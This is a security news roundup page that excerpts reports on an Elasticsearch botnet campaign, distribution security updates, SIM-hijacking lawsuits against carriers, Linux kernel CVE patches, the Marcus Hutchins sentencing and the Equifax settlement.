Language Selection

English French German Italian Portuguese Spanish

Security

Security: Cyberattack on Elasticseach, Available Updates, AT&T Liability and New HardenedBSD Release

Filed under
Security
  • Cyberattack on Elasticseach Databases turns DBs into Zombies/Botnets

    Recently a new cyberattack added into the list of Elasticsearch which is making Elasticsearch databases into Zombies or botnets.

    There is a list of attacks conducted on Elasticsearch databases in the past few years. The new one raises more tension among security experts due to its complexity and use of different tactics to evade security system and carry forward the attack successfully.

    Elasticsearch is a popular tool that helps companies managing billions of records in the database easily. Its source code is open and big companies like Netflix, Uber, Dell, and Adobe are already using Elasticsearch. I hope you now have an idea of how important it is for hackers to find vulnerabilities in this tool and exploit them to gain systems control.

    Recently, Trend Micro, a cybersecurity company revealed hackers have targetted publicly available Elasticsearch databases by delivering a backdoor as a payload.

    The attack requires multiple scripts to be executed on the system, starting from disabling the system firewall and stopping all the crypto mining processes running on the system. Once these tasks are completed successfully then hackers download another script to the server from a compromised or a grey website.

  • Security updates for Monday

    Security updates have been issued by Debian (patch, sdl-image1.2, and unzip), Fedora (deepin-clone, dtkcore, dtkwidget, and sqlite), Mageia (virtualbox), openSUSE (firefox), and SUSE (cronie and firefox).

  • Court Will Decide If AT&T Is Liable For Cryptocurrency Theft Caused By Shoddy Security

    Wireless carriers are coming under increasing fire for failing to protect their users from SIM hijacking. The practice involves posing as a wireless customer, then fooling a wireless carrier to port the victim's cell phone number right out from underneath them, letting the attacker then pose as the customer to potentially devastating effect. Back in February, a man sued T-Mobile for failing to protect his account after a hacker pretending to be him, ported out his phone number, then managed to use his identity to steal thousands of dollars worth of cryptocoins.

    T-Mobile customers aren't the only users who've experienced this problem. US entrepreneur and cryptocurrency investor Michael Terpin sued AT&T last summer (pdf) for the same thing: somebody ran a SIM hijacking scam on AT&T, then stole his identity and, in turn, stole $23.8 million in cryptocurrency.

  • Stable release: HardenedBSD-stable 12-STABLE v1200059.2

Debian Outs First Linux Kernel Security Update for Debian GNU/Linux 10 "Buster"

Filed under
Security
Debian

Released earlier this month, the latest Debian GNU/Linux 10 "Buster" operating system just got its first Linux kernel security update, which addresses a security flaw (CVE-2019-13272) discovered by Google Project Zero's Jann Horn in Linux kernel's ptrace subsyste, which could let a local user obtain root privileges.

"Jann Horn discovered that the ptrace subsystem in the Linux kernel mishandles the management of the credentials of a process that wants to create a ptrace relationship, allowing a local user to obtain root privileges under certain scenarios," reads the security advisory published by Salvatore Bonaccorso last week.

Read more

OSS and Security Leftovers

Filed under
OSS
Security
  • OpenHMD: Open Source Project for VR Development

    A universal distortion shader was added to OpenHMD. This additions “makes it possible to simply set some variables in the drivers that gives information to the shader regarding lens size, chromatic aberration, position and quirks.”

    They also announced plans to change the build system. OpenHMD added support for Meson and will remove support for Autotools in the next (0.4) release.

    The team behind OpenHMD also had to remove some features because they want their system to work for everyone. Support for PlayStation VR has been disabled because of some issue with Windows and mac OS due to incomplete HID headers. NOLO has a bunch of firmware version, many will small changes. OpenHMD is unable to test all of the firmware versions, so some version might not work. They recommend upgrading to the latest firmware release. Finally, several devices only have limited support and therefore are not included in this release.

  • API Fortress launches open source app, 3loa Helper, to automate 3-legged OAuth 2.0 flows

    API Fortress, the leader in continuous API testing, announces 3loa Helper, an open source application that automates 3-legged OAuth 2.0 flows from the world’s largest social and search providers.

    By simply integrating API Fortress with 3loa Helper, developers and test engineers can test and validate 3-legged OAuth flows.

    “Too many tests today don’t truly reproduce the user flows a production API sees,” says Patrick Poulin, CEO and co-founder at API Fortress, “This leaves risky holes in a test plan, and ignores what is often the very first step for users.”

    It is difficult to automate 3-legged OAuth 2.0 flows for API testing because 3-legged OAuth 2.0 was specifically designed to require user intervention.

  • Week 9 Report

    First of all, This week was the second Evaluation Result of the Project and I am happy on working on this project and thanks to all LO family.

  • Building a Successful Open Source Management Strategy

    When software is deployed continuously, composition analysis for quality, compliance, and security within code needs to be managed strategically. Ensuring that the benefits of open source are not outweighed by risks, software developers and corporate counsel must align around tools and practices to help manage their open source code responsibly to drive business value. Building and Maintaining a Successful Open Source Management Strategy discusses:

  • Rowan college affordability initiative takes aim at textbooks

    Rowan University is doubling the size of a grant program to create free course materials for students...

  • RISC Is Fundamentally Unscalable
  • After Two Years, Malwaretech Is A Free Man

    The judge them emphasized that, on top of everything else, Hutchins had been away from home for two years.

    That’s when what every lawyer watching in the courtroom I spoke with called unprecedented. The Judge suggested Hutchins should get a pardon, which would enable him to come back to the US to work. “While court has no pardon power, matter reserved to the executive. Truly left for another day.”

    He then imposed Hutchins’ sentence. “We reach a point in balancing these considerations, court left to make final call. Final call is a sentence of time served with one year of supervised release.” He went on to make it clear that, once Hutchins finishes packing up his life in LA, he wanted to be sure that Immigration doesn’t get custody. “Nothing in this judgement requires he stay in the United States. I’m seeking to avoid him being taken into custody by Immigration and Customs. We don’t need any more publicity or another statistic.”

  • Arduino Selects Auth0 as Standardized Login for Open-Source Ecosystem

    Auth0, a global leader in Identity-as-a-Service (IDaaS), today announced it has been selected as the identity management platform of choice for Arduino®, the world’s leading open-source hardware and software ecosystem. With a global community of 30 million “makers”, Arduino will use Auth0 to replace its own Single Sign On solution for all of its public facing web properties, including Arduino Create and community apps.

Security Leftovers

Filed under
Security
  • Russia Suspected In Attempted ProtonMail Client Hack

    ProtonMail, an email service based in Switzerland, has been targeted in a sophisticated cyber attack aimed at journalists investigating Russian intelligence activities, the company says.

    The target was Bellingcat, an open-source investigative website that has been probing the involvement of Russia and its GRU intelligence service in the downing of flight MH17 over Ukraine in 2014.

    On Saturday, ProtonMail posted a blog saying that these attempts have failed, and that reports stating that ProtonMail itself had been hacked were inaccurate.

  • 5 Free Linux Antivirus – Anti-Ransomware, Server Malware And Spyware [Ed: Very poor, weak article. Compares NSA back doors in Windows to Linux and speaks of security problems one actually needs to recklessly install.]

    The WannaCry ransomware epidemic hit customers on Home windows like wildfire, however what can it do on a Linux system operating wine? Is Linux proof against Ransomware? Will Linux shield you from ransomware assaults?

  • Fernando Corbato: Scientist who fostered the digital revolution and the computer password

    Fernando Corbato’s achievements in computer science have had a huge impact on daily life. His work drastically expanded the usefulness of the computer and put its benefits at the reach of all. But he also made his mark on the modern world by conceiving and applying the idea of controlling computer access by passwords.

    Corbato, who has died aged 93, was a professor emeritus at the Massachusetts Institute of Technology, where he was interested in the problem of increasing access to computers while protecting individual privacy and data. Passwords seemed to be the solution, and he found himself drawn to the discipline that would become known as computer science.

    He entered the new arena in its early days, when the slide rule or the mechanical calculator were mainstays of computation. In 1956, when Corbato began at the MIT Computation Centre, machines and their operations were characterised by such items as vacuum tubes, paper tape and stacks of the infamous punch cards – the last giving rise to the slogan, “Do not fold, spindle or mutilate.”

Canonical Outs Linux Kernel Security Patch for Ubuntu 16.04 LTS to Fix Six Flaws

Filed under
Security

This new Linux kernel security patch comes hot on the heels of the security update released earlier this week for the Ubuntu 19.04 (Disco Dingo) and Ubuntu 18.04 LTS (Bionic Beaver) operating system series, but it's only available for users of the Ubuntu 16.04 LTS (Xenial Xerus) operating system series running the stock Linux 4.4 kernel.

It addresses a total of six flaws, including an integer overflow (CVE-2019-10142) discovered in Linux kernel's Freescale (PowerPC) hypervisor manager and a race condition (CVE-2018-20836) discovered in the Serial Attached SCSI (SAS) implementation, which could allow a local attacker to execute arbitrary code or cause a denial of service (system crash).

Read more

Security Leftovers

Filed under
Security
  • Goodbye Docker: Purging is Such Sweet Sorrow

    After 6 years, I removed Docker from all my home servers.

  • Equifax Might Owe You $125. Here's How to Get It

    If you're one of the 147 million people in the United States affected by the egregious Equifax credit bureau hack in 2017, you were probably resigned to getting some free credit monitoring out of it and moving on. But nearly two years later, attorneys general from 50 US states and territories, the Federal Trade Commission, and the Consumer Financial Protection Bureau finally have your back. Sort of. They've negotiated a settlement with Equifax that entitles all victims to 10 years of free credit monitoring, or $125. Here's how to make sure you get yours.

  • Why you probably won’t actually get $125 from the Equifax settlement

    See, while Equifax has agreed to a $700 million settlement — compare to its revenue of $880 million last quarter alone — it’s technically only a $425 million settlement as far as affected consumers are concerned, with the rest of the money going to pay penalties.

    And of that $425 million, it turns out only a paltry $31 million is actually set aside for those individual $125 cash payments — the rest is all for free credit monitoring, reimbursements, or if you could somehow miraculously prove you actually suffered identity theft as a result of the breach.

  • MBs ‘severely underestimate’ cybersecurity vulnerabilities: report [iophk: Windows TCO]

    And, according to cyber security provider Keeper Security, which commissioned a study of more than 500 senior-level decision makers at companies with 500 employees or less, cyber security efforts are not at the top of the list of SMBs when it comes to where leaders are putting their focus and efforts – with US businesses “ripe for the picking”.

Security Leftovers

Filed under
Security

LastPass vs Bitwarden: Should You Switch to An Open Source Password Manager

Filed under
OSS
Security

Choosing a password manager can be a headache. You will be using it to store your passwords, notes, and whatnot. As such, you want it to be safe and reliable. LastPass is one of the most popular password managers but it has some flaws. It has been in the news for getting hacked, more than once, and is owned by LogMeIn.

Read more

Security and Proprietary Software With Back Doors

Filed under
Microsoft
Security
  • Cyber expert who helped stop WannaCry sentenced to time served in malware case

    While Hutchins was sentenced to time served, he could have faced up to 10 years in prison and $500,000 in fines. He served a few days in jail after being arrested in 2017, but was then freed on bail on the condition that he remain in the U.S. while his case was pending.

  • The Latest: Cyber expert gets time-served in malware case

    U.S. District Judge J.P. Stadtmueller sentenced 25-year-old Marcus Hutchins on Friday in Milwaukee to time served, with a year of supervised release. Stadtmueller said the virus Hutchins helped stop was far more damaging than the malware he wrote.

  • Cyber-Crook Turned Global Hero Avoids Prison In Malware Case

    Marcus Hutchins was sentenced Friday by U.S. District Judge Nancy Joseph in Milwaukee, Wisconsin. He pleaded guilty in April to two counts related to his marketing and distribution of malware called Kronos and UPAS, which his customers used to steal the bank details of unsuspecting victims around the world. Hutchins was arrested in July 2017 after he traveled to the U.S.

  • Boeing's Corporate Suicide

    Boeing's cost-cutting means it lacks the necessary in-house software expertise to develop and QA the fix.

Which Linux distro is best for privacy?

Filed under
GNU
Linux
Security

Linux Operating systems are better for privacy and security than their Mac and Windows counterparts. They are also open source, which means they are much less likely to be hiding backdoors for their developers, the NSA, or anybody else.

It is for this reason that Linux distros are the Operating System of choice for security professionals and privacy advocates as well as for the majority of computer servers around the globe.

There are plenty of Linux distros to choose from. And this can make it confusing for anybody wanting to move away from Windows in favor of something more secure. Even existing Linux users may be slightly unsure as to which Linux distro they ought to be using if they value privacy and security.

In this article, we will walk you through two of the best Linux distros for protecting your data and staying clear of hackers. All Linux distros have specific peculiarities and advantages, meaning that they all do slightly different things. However, there are two Linux distros that stand out where privacy is concerned...

Read more

Syndicate content

More in Tux Machines